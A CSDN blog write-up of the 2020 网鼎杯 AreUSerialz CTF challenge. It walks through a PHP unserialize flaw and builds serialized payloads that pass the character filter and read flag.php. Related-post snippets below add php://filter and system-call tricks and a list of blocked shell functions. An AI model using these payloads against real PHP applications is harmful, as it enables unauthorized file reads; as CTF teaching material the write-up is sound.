2020-网鼎杯-Web-AreUSerialz | 代码审计与反序列化

已于 2022-09-08 18:47:26 修改
阅读量134 收藏
点赞数 2
分类专栏: web 文章标签: php web安全
于 2022-08-12 15:14:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55793759/article/details/126302621
版权

一道PHP代码审计题目

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
    
}

主要分三块分析,FileHandler类、is_valid( )函数和get传参
从最后的传参函数开始

if(isset($_GET{'str'})) {
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
}

传入一个str字符串变量,经过is_valid( )函数,然后对变量进行反序列化

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

然后is_vaild函数主要检查传入变量的每个字符的ASCII码是否都是在32~125之间

接下来是FileHandler类,入手是__construct( )__destruct( )两个魔术函数方法,__construct( )是创建新对象是调用,这里没有新对象创建,只能是__destruct( )在对象毁灭时调用

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

这里先判断op的值,如果op===‘2’则会覆盖为’1’,目前不知道是干嘛的,往下走,然后对content进行置空,调用process方法

  public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

如果op==‘1’,进入write( ),如果op==‘2’,就进入read( ),同时output( )输出

 private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

判断filename是否存在,然后将filename文件内容返回输出
所以我们要从process( )进入read( ),因此要让op=2,而前面__destruct( )方法是强等号(===)判断,让op=2即可以绕过

所以,可以构造Payload

<?php
class FileHandler {
    protected $op = 2;
    protected $filename = 'flag.php';
    protected $content;
}
echo serialize(new FileHandler);
//O:11:"FileHandler":3:{s:5:"*op";i:2;s:11:"*filename";s:8:"flag.php";s:10:"*content";N;}
?>

传入后发现不行,原因是private和protect类型在序列化的时候会引入不可见字符\x00,这些字符对应的ASCII码为0,经过is_valid函数以后会返回false,不能通过is_valid函数的检验

  • 到这里,有两个办法可以进行绕过

1、在php7.1+的环境下对属性的要求不是很敏感,所以可以用public属性绕过

<?php
class FileHandler {
    public $op = 2;
    public $filename = 'flag.php';
    public $content;
}
echo serialize(new FileHandler);
//O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}
?>

2、在PHP序列化字符串中,只要把其中的s改成大写的S,后面的字符串就可以用十六进制表示,从而绕过

注:chr(0)的值是0,表示成十六进制是0x00,表示成二进制是00000000,虽然chr(0)不会显示出什么,但是它是一个字符

<?php
class FileHandler{
    protected $op = 2;
    protected $filename = 'flag.php';
    protected $content;
}
$a = serialize(new FileHandler);
$a = str_replace(chr(0),'\00',$a);
$a = str_replace('s:','S:',$a);

echo urlencode($a);
//O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";N;}
?>

然后直接查看源码
在这里插入图片描述
考查点:代码审计,反序列化,ASCII码为0的情况

迷途羔羊pro
关注
专栏目录
网鼎杯2020青龙组-web
ChenZIDu的博客
05-18 954
看来反序列化要多打点了,反序列化这块都不怎么熟~ AreUSerialz 源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "
【CTF】java反序列-2020-网鼎杯-朱雀组-Web-think_java
(∪.∪ )...zzz的博客
06-13 3629
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz
热门推荐
艺博东的博客
05-10 1万+
2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz http://94b1c2d4231f4b4bb92162d5e89dec8f5817750c48224380.cloudgame2.ichunqiu.com/ 进入网址 直接在URL后面输入: ?str=O:11:“FileHandler”:3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:“php://filter/convert.base64-encode/resour
2020-网鼎杯-青龙组-Web-AreUSerialz
feng的博客
11-03 776
前言 是一道PHP反序列胡的题目,不过那个ASCII的绕过就是我们知识盲区了,还有就是路径的问题,不过我是在CTFHub上做的这个题目,不存在路径的问题。 WP 首先进入环境,进行代码审计: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; functio
网鼎杯-青龙组-Web-Wp
XunanSec的博客
05-26 1211
0x01 开局一张图 一看就知道让我们代码审计 对于这种一长串的源码,还是逐步来解把 首先的解题思路就是查看CTF题目的命名和代码函数 CTF题目这里命名为AreUSerialz,我反正一眼看不出什么端详,打的CTF比较少,直接看函数名字 在下面可以看到有一个unserialize()函数,那这一题基本上就是考反序列化的知识了。 我们整体的浏览一边代码,来看一下程序的大概走向。 <?php include("flag.php"); highlight_file(__FILE__); cl
[网鼎杯 2020 朱雀组]phpweb 1
weixin_53150482的博客
07-13 467
[网鼎杯 2020 朱雀组]phpweb 1
phpweb-[网鼎杯 2020 朱雀组]-[BUUCTF]
qwsn
11-23 1998
0x01、Web 1.phpweb-[网鼎杯 2020 朱雀组]-[传送门->BUUCTF] 第一步:点击传送门,打开题目环境 观察题目页面: //打开网页观察网页显示动态,发现网页每隔一段时间会刷新一下,说明可能自动间隔一段时间刷新一次,观察网页,网页上会显示一段warning信息,并提示了data()函数。 //利用BurpSuite拦截网页,看一下有什么异常。观察发现网页会传递两个参数,func和p。func对应的值为date,p对应的值为一串时间格式,说明网页可能向后端传递函数名及其对应的参数
AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF]
qwsn
11-23 1710
0x01、Web 1.AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF] 第一步:打开题目环境,进行代码审计 <?php include("flag.php"); //文件包含flag.php highlight_file(__FILE__); //高亮显示当前页面源码 class FileHandler { //类:FileHandler protected $op; //保护属性:$op protected $
[网鼎杯 2020 青龙组]AreUSerialz1详解两种常用方法及php伪协议扩展
最新发布
m0_73615178的博客
01-21 664
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
CTF赛题-[网鼎杯2020青龙组]AreUSerialz
m0_57379855的博客
03-25 2135
CTF赛题-[网鼎杯2020青龙组]AreUSerialz代码审计构造函数 代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filenam
[网鼎杯 2020 朱雀组]之phpweb
snowlyzz的博客
05-10 1180
打开页面: 还以为是csgo里的JAME呢,没想到是孙笑川。。。 F12查看源码,和观察的一样,setTimeout("document.form1.submit()",5000)每隔五秒钟将会提交一次form1,然后是一串时间字符串2021-10-20 12:14:50 pm 这里提交了两个值,一个是func 值是date 另一个是p 值是 Y-m-d h:i:s 猜想一下,如果func的值是 system ,p的值是ls /flag呢? 可以先用md5来校验一下是否能够成功执行 ...
第二届网鼎杯(第一场:青龙组)web WriteUp
a3320315的博客
05-11 1900
学校战队总排名52,web和pwn各拿了一个一血,只能说师傅太强了,不过后来的排名有点起飞,最后半小时,直接从前十名飞出去了~~ filejava 这道题主要考察的是java的xxe漏洞,这个题目总共有两个功能,上传和下载功能,有上传和下载,我们就想到两个漏洞点,是否有任意文件上传或者任意文件下载? 经过测试确实有任意文件下载,但是任意文件上传确不存在,但是却能够为我们提供路径~~ 任意文件下载 但是我们不知道web的路径怎么办?我们还有文件上传的报错~~ 文件上传 我们可以看到报错处直接给了web
[网鼎杯 2020 朱雀组]phpweb
m0_62092622的博客
04-10 939
打开之后查看源码发现一个隐藏的表格,是post传参 而且默认传入参数为func=date&p=Y-m-d+h%3Ai%3As+a 经查询,date()是PHP的一个函数,而p则是func的参数 date(string $format, int $timestamp = ?): string 返回将整数 timestamp 按照给定的格式字串而产生的字符串。如果没有给出时间戳则使用本地当前时间。换句话说,timestamp 是可选的,默认值为time() 注意这里真的是使用了这个函数
[CTF 真题] 2018-网鼎杯-Web-Unfinish
weixin_43586169的博客
07-22 1224
首先进行一个扫描,发现注册与登陆页面,通过观察发现可能存在二次注入,尝试注册一个带有SQL语句的账号,然后登陆这个账号查看显示用户名的地方是否进行了执行,返回的是否是数据库中的数据。通过脚本批量注册,然后进行登陆,最后获得Flag。...
2020-网鼎杯-朱雀组-Web-phpweb
weixin_45844670的博客
09-23 289
打开题目,发现页面一直刷新(每5秒) 使用bp拦截请求发现post了两条数据 一个是func,一个是p 猜测这个导致一直刷新 查询后发现,这里可能用到了一个函数 call_user_func(函数名,参数) 使用这个函数查看一下源码 func=file_get_contents&p=index.php 得到了 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_so
[网鼎杯 2018]Fakebook——SSRF/反序列化漏洞/SQL注入
sGanYu
09-29 3775
解法一 解法二 解法三 考点 • 目录扫描 • SSRF • SQL注入 • PHP反序列化 前言:当我们拿到网站的时候,首先需要对这个网站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台又或者是否存在备份文件,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞 开始之前,先扫描一下该网站下目录,查看有什么敏感信息泄露 直接扫出了flag.php文件,有是有,但是访问后,回显内容为空,当我们确定了一个
Web之buuctf-[网鼎杯 2020 青龙组]AreUSerialz
qq_43682582的博客
03-28 308
源码分析 <? phpinclude("flag.php"); highlight_file(__FILE__); class FileHandler #一个类 { protected $op; #类里面的三个受保护变量 protected $filename; protected $content; function __construct() #给三个变量赋值,并调用process()公有函数,构造函数?
2020 网鼎杯web复现
fly夏天的博客
09-09 786
复现平台buuctf 白虎组: PicDown 本题是任意文件下载 尝试下载/proc/self/comline 得到提示 python2 app.py (原题应该是main.py这里可能是复现环境的差异) 下载app.py,代码审计 from flask import Flask, Response from flask import render_template from flask import request import os import urllib app = Flask
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值